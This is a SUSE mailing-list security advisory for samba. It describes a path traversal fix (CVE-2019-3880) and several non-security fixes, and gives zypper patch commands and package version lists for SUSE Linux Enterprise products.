______________________________________________________________________________ An update that solves one vulnerability and has four fixes is now available. Description: This update for samba fixes the following issues: Security issue fixed: - CVE-2019-3880: Fixed a path/symlink traversal vulnerability, which allowed an unprivileged user to save registry files outside a share (bsc#1131060). Non-security issues fixed: - Fix vfs_ceph ftruncate and fallocate handling (bsc#1127153). - Abide by load_printers smb.conf parameter (bsc#1124223). - s3:winbindd: let normalize_name_map() call find_domain_from_name_noinit() (bsc#1123755). - s3:passdb: Do not return OK if we don't have pinfo set up (bsc#1099590). - s3:winbind: Fix regression (bsc#1123755). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1037=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1037=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1037=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1037=1 - SUSE Linux Enterprise High Availability 12-SP4: zypper in -t patch SUSE-SLE-HA-12-SP4-2019-1037=1 - SUSE Linux Enterprise High Availability 12-SP3: zypper in -t patch SUSE-SLE-HA-12-SP3-2019-1037=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1037=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1037=1 - SUSE Enterprise Storage 5: zypper in -t patch SUSE-Storage-5-2019-1037=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libndr-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-standard-devel-4.6.16+git.154.2998451b912-3.40.3 libsamba-util-devel-4.6.16+git.154.2998451b912-3.40.3 libsmbclient-devel-4.6.16+git.154.2998451b912-3.40.3 libwbclient-devel-4.6.16+git.154.2998451b912-3.40.3 samba-core-devel-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libndr-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt-devel-4.6.16+git.154.2998451b912-3.40.3 libndr-standard-devel-4.6.16+git.154.2998451b912-3.40.3 libsamba-util-devel-4.6.16+git.154.2998451b912-3.40.3 libsmbclient-devel-4.6.16+git.154.2998451b912-3.40.3 libwbclient-devel-4.6.16+git.154.2998451b912-3.40.3 samba-core-devel-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libdcerpc-binding0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr0-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-4.6.16+git.154.2998451b912-3.40.3 samba-client-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 samba-libs-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): libdcerpc-binding0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP4 (noarch): samba-doc-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libdcerpc-binding0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr0-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-4.6.16+git.154.2998451b912-3.40.3 samba-client-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 samba-libs-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libdcerpc-binding0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Server 12-SP3 (noarch): samba-doc-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise High Availability 12-SP4 (ppc64le s390x x86_64): ctdb-4.6.16+git.154.2998451b912-3.40.3 ctdb-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise High Availability 12-SP3 (ppc64le s390x x86_64): ctdb-4.6.16+git.154.2998451b912-3.40.3 ctdb-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Desktop 12-SP4 (noarch): samba-doc-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libdcerpc-binding0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-4.6.16+git.154.2998451b912-3.40.3 samba-client-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 samba-libs-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Desktop 12-SP3 (noarch): samba-doc-4.6.16+git.154.2998451b912-3.40.3 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libdcerpc-binding0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc-binding0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libdcerpc0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-krb5pac0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-nbt0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr-standard0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libndr0-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libndr0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libnetapi0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-credentials0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-errors0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-hostconfig0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-passdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamba-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsamdb0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbconf0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libsmbldap0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libtevent-util0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 libwbclient0-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-4.6.16+git.154.2998451b912-3.40.3 samba-client-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-client-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 samba-libs-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-libs-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-32bit-4.6.16+git.154.2998451b912-3.40.3 samba-winbind-debuginfo-4.6.16+git.154.2998451b912-3.40.3 - SUSE Enterprise Storage 5 (aarch64 x86_64): ctdb-4.6.16+git.154.2998451b912-3.40.3 ctdb-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-ceph-4.6.16+git.154.2998451b912-3.40.3 samba-ceph-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debuginfo-4.6.16+git.154.2998451b912-3.40.3 samba-debugsource-4.6.16+git.154.2998451b912-3.40.3 References: https://www.suse.com/security/cve/CVE-2019-3880.html https://bugzilla.suse.com/1099590 https://bugzilla.suse.com/1123755 https://bugzilla.suse.com/1124223 https://bugzilla.suse.com/1127153 https://bugzilla.suse.com/1131060 From sle-security-updates at lists.suse.com Thu Apr 25 10:15:42 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 18:15:42 +0200 (CEST) Subject: SUSE-SU-2019:1033-1: moderate: Security update for ImageMagick Message-ID: <20190425161542.99F3DF3D3@maintenance.suse.de> 